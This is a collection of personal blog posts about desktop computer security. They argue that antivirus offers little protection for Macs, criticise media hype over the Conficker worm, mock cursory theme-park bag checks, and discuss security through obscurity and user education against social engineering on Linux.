Ubuntucat

A self-proclaimed analyst at CNET has predicted that Apple will recommend antivirus.

Apart from the fact that Apple already did recommend antivirus a few months ago (but has since removed that page), isn’t that quite obvious? Some prediction. Unfortunately, the reasoning for that recommendation makes me wonder what Jon Oltsik is analyzing. Here are the reasons he gives for Apple recommending antivirus, and they’re all pretty much baseless:

Macs users are a lucrative target. Mac owners tend to affluent and Net savvy [sic]. To the bad guys, this means identities to steal and broadband connections to exploit.

If Mac users tend to be net-savvy, then why are their machines being compromised? Why don’t they have mechanisms in place to protect themselves from identity theft? If Macs are currently such a great target for malware, why is there so little malware out there for Macs now?

Organized cybercrime is diversifying. Cybercriminals tend to work as a loose confederation with each group specializing in a certain task. There are malware writers, botnet owners, mules, etc. Some entrepreneurial bad guy is bound to see a green field market in Mac cybercrime, recruit Mac hackers, develop expertise, and market these capabilities. If there is an equivalent of a cybercrime venture capital firm, they are probably looking at business plans like this already.

Diversifying ways to compromise machines doesn’t mean you attack multiple platforms. That’s just more work for very little return.

Macs are growing in the enterprise. In many large firms, Macs make up about 5 percent of endpoints. If the bad guys infect these systems, they can troll the network looking for other vulnerabilities and juicy data at will.

How about if the bad guys infected the machines that make up 95% of endpoints? Wouldn’t that give them more “juicy data”?

Macs are fairly easy to hack. In March as part of a contest, security expert Charlie Miller won $5,000 for exploiting a hole in Safari in about 10 seconds. If he can do this in 10 seconds, how many techies can do it in an hour? This is a frightening thought to me.

Okay, now this is totally ridiculous. Charlie Miller didn’t just walk into that competition and find a hole in 10 seconds. He knew about that hole for over a year and then exploited it in 10 seconds (in his own words: “It was an exploit against Safari 4 and it also works on Safari 3. I actually found this bug before last year’s Pwn2Own but, at the time, it was harder to exploit”). There’s a big difference there.

And all operating systems have security holes. That’s why Microsoft, Apple, and even Linux distribution maintainers all issue regular updates and patches.

I don’t understand why people imagine that you either have an unprotected computer or you have antivirus. (Or they think that an operating system that ever has a security hole is necessarily as insecure as another operating system with security holes.) Antivirus and protection are not the same thing. They’re not even similar. Antivirus does not offer you any real security at all. Don’t believe me? Go ask all the Windows users infected with malware what antivirus they’re running. Odds are that almost all of them will have some kind of fancy schmancy “security” software installed… software that did nothing to protect them.

Mac OS X isn’t a model in the best security, but its defaults are certainly better than Windows’ defaults. No operating system is invincible, and that includes Mac OS X. But Mac users will be no more protected with antivirus software than they will be without it. Know what the latest security breaches were for Macs? Trojans. Do you know how useful antivirus is against gullible users installing pirated software? Not at all.

Trojans rely on social engineering, and no operating system “security” can stop that, because the security hole is the user, not the computer. If the user can be tricked into giving away her password or giving a bad program access to system files, then you can have all the proper permission level separation or “security” suites in the world, and they will all be for naught. Have NoScript installed? She’ll whitelist every site. Have an algorithm for guessing malware? It’ll give so many false positives that she’ll learn to ignore its warnings.

Why will Apple eventually recommend antivirus? Plain and simple—because antivirus software is the most successful placebo ever introduced to the mass populace. As Mac marketshare continues to grow, more and more trojans will pop up, and more and more gullible users will keep installing them, and Apple will finally have to admit that Macs are just computers and not magic. But instead of saying “Users are stupid and need education,” they’ll toe the party line and recommend people install useless antivirus software, just as Microsoft does now. At least then they can enter into lucrative business partnerships with antivirus software companies.

Break out the sheepskin condoms, people.

I find the “news” coverage of Conficker to be absolutely disgraceful. Is this what passes for journalism?

I want you to imagine that there is a parasite that can invade your body and reside in there indefinitely. Once in your body, it could give you a heart attack, it could poison your blood stream, or it could make your liver fail. Once the parasite was discovered to be in the wild, doctors discovered that you could avoid getting the parasite by simply washing your hands before you ate. They also figured out that the parasite was going to change shape on a certain day. As that day approaches, people who haven’t been washing their hands go into a panic. They don’t know if they have the parasite or not. They start running to quack doctors who say they’ll make sure to protect these people against the worm if the potentially infected individuals just buy a prescription subscription for a special drug. After the parasite changes shape, though, no one’s had a heart attack or failed liver yet. So all the parasite-infected people celebrate that the parasite hasn’t done anything.

What?! Did I miss something?

Yes, the scenario I’ve just described in biological terms is exactly what just happened with the Conficker worm that’s infected an estimated 10 million Windows computers.

Microsoft discovered a flaw in its operating system and patched the flaw back in October 2008. The latest iteration of the Conficker worm, which takes advantage of this flaw, began surfacing around November 2008 and kept infecting Windows computers for months. The experts all knew that on April 1, 2009 the infected computers would have the worm checking for updated instructions from its creators.

Then the panic came in. Oh, no! It’s coming! It’ll be the end of the internet as we know it. I’m turning off my computer that day. If I buy this antivirus software will it protect me? Hide the children! Oh. Nothing happened? It has the power to attack and bring down major websites and government systems or steal personal information but nothing appeared to happen today? Oh. Okay. It was a big joke then. Ha ha. Who cares if I’m infected? I’m just going to go on my merry way.

Uh, no. First of all, Windows users should regularly install Windows updates. This was patched even before it was a real threat. And it doesn’t matter if the world didn’t seem to end today. The Conficker worm has the power to do serious damage, and no one knows when it’ll decide to do that damage or what kind of damage it will decide to do. It doesn’t mean you fly into a panic as if it were Orson Welles’ reading of War of the Worlds. But it doesn’t mean you go on your merry, care-free way either.

Educate yourself. Protect yourself. Be sensible. Conficker is dangerous but instead of flying into blind paranoia, just take practical and level-headed steps to protect your computer and your personal information. Silent can still be deadly, and I’m not just talking about flatulence.

I have to say that Disneyland and California Adventure have a pretty smooth operation. Yes, they charge you an arm and a leg and a kidney for the two theme parks (especially if you want to go to both and not just one), but they know how to manage large crowds of people.

The people leaving rides exit one direction. The people getting on the rides enter from the other side, and only after the people leaving have left. The staff rope off sidewalks for parades so that there’s a clear division between those who want to sit and watch the parade and those who want to pass through the area. The “fast pass” system makes it easy to get into semi-popular (not the absolute newest, though) rides without waiting in line for hours.

But what is up with the “security” check when you first arrive at the park? It’s not like airport security (which has its own problems and holes)… it doesn’t even resemble security. If you have a bag, they have you open the bag, and they take a cursory glance inside the bag. I had a backpack and unzipped the large pocket and that’s all they saw. I don’t know if they were checking for guns, drugs, or bombs, but I could have had any or all of the above in the small pocket of my backpack, the large pocket (but buried underneath the top layer of stuff), or my jacket pockets.

The second time I went through the check, they picked up my little insulated lunch bag and asked “What’s in this?” I said it was some snacks. They believed me and put it down. How is that security? I can say it’s full of snacks. Of course I can say that. It could really be full of fireworks or spray paint or box cutters. They’re going to take my word for it?

Generally Disney has a smooth operation going in its theme parks. If they could just get the “security” check out of there—or actually checking people’s bags thoroughly—it’d be even smoother.

I don’t believe that security through obscurity is ideal or ultimately effective. I don’t believe it’s a generally good security approach. Nevertheless, it is not often the same as no security at all. Security through obscurity can have its place.

A few years ago, when it was brought to light that the newest (at the time) Ubuntu version stored the administrative password in plain text, that incident was a huge embarrassment to Ubuntu developers, and they fixed the security hole within hours of it having been brought to their attention. Nevertheless, it had been in place for months prior to being brought to the developers’ attention. Were any Ubuntu installations compromised because of this bug? Probably not.

Likewise, most people don’t know that physical access to a computer means (except in rare cases) total administrative access. If you encrypt your drive, you can prevent unauthorized access to your files. If you put a password on the BIOS and disable booting from CD, you can slow down or make more inconvenient the unauthorized access. Maybe that’ll stop people from compromising your computer if you’re away from it for only a few minutes.

Many users are naive to just what prolonged physical access means, though, in terms of security, and that’s dangerous, because then security through obscurity works against you. I used to believe (before I started using Linux) that having my laptop prompt me for a password upon waking the computer would mean that if my laptop were ever stolen, no one could get my files. Before I booted a Knoppix CD on his laptop, my dad used to think a fingerprint scanner would prevent people from seeing his files. In these cases, the “security” is obscured for the user and not the thief.

If a thief makes her living by taking the data off your computer (probably for the purposes of identity theft) and not solely by selling the hardware, she probably knows exactly how to access your data, whether it be resetting the BIOS password, booting from a live CD, or even moving the hard drive to another computer.

There have been quite a few debates about whether recovery mode in Ubuntu should exist or perhaps be hidden by default. In Windows, if you need emergency administrative access, you need to boot a CD. In Mac OS X, you have to know the relatively obscure hold-down-Cmd-S-while-booting procedue to get into recovery mode. In Ubuntu, though, it’s right there in the boot menu. Just press the down arrow once and you’re in recovery mode, which means you have root (or total administrative) access to the computer.

On the one hand, obscuring recovery mode might give people a false sense of security (thinking it’s difficult to gain root access). On the other hand, having it in the boot menu kind of advertises it, and you might have a curious sibling or roommate who selects it and starts getting playful on the command-line, and she might not have done so if it weren’t in her face the way it is.

Outside of the computer world, it’s a bit like keeping the key to your house underneath the welcome mat. Doing so is definitely bad security. On the other hand, most people won’t know exactly where you keep your key or if you keep it under the welcome mat at all. If you post up a big sign next to your door saying “Hey, the key is underneath this welcome mat!” you’ll be sure to have your home broken into.

When it comes to computer security, definitely encryption and restriction of physical access should be publicized more as real security options, but I do believe there are tradeoffs to embracing and eschewing security through obscurity. Just make sure you are obscuring access for others and not for yourself.

In Linux online communities, oftentimes there are debates about which operating is the most secure—Windows or a Linux-based distribution. The debates usually go something like this:
Do I have to worry about security in Linux the way I did in Windows? No, you don’t have to. Linux is much more secure. But isn’t that just because it’s less targeted? If it were as popular as Windows, it would have just as many security problems. No, it wouldn’t. Read this article about how Linux has better security, and don’t forget that Linux servers are huge targets and still more secure than Windows servers.

And it goes on and on. The details of a secure structure, sensible (from a security standpoint) defaults, and frequent patches for exploits are all important parts of security. Ultimately, though, security debates about the structures of the OS are moot when the user does not employ good security practices. It’s a bit like people debating whether kevlar is “more secure” than chainmail armor. Well, what if the attack is through biological warfare rather than a bullet or sword? What if the person you’re trying to secure can be tricked into taking off the kevlar/chainmail? Then it doesn’t really matter which covering is more difficult to penetrate, does it?

And this is also why bringing in servers into desktop security debates doesn’t shed light on whether an increase in user base will lead to more security compromises. Servers tend to be administered by server administrators—professionals whose job it is to constantly battle and prevent online security breaches. On the home desktop (and sometimes even the business workstation), users tend to be less savvy about what to click or not click, what to install or not to install, and when it’s a good idea to type one’s password.

Yes, developers should try to strengthen the security of the OS in terms of structure and defaults. Yes, developers should create patches for newly discovered exploits (buffer overflows, for example). Nevertheless, if the Linux user base does increase to the point where desktop Linux is a significant target for malicious users, and computer users in general remain as uneducated as they are now, then all those security patches will be for naught. Users who can’t discern the difference between a spoofed webpage and a real webpage are the security exploits that can be patched only through education. Users who will give their passwords away to untrustworthy sources are security exploits. Users who will install some “cool” program (yes, in Ubuntu it could be a .deb file you double-click or an added repository) that happens to contain spyware or a rootkit are security exploits.

A larger Linux user base with no better education than computer users as a whole have now is going to be subject to the same social engineering malware attacks that the current larger user base Windows has. No developer-created patch is going to fix that hole.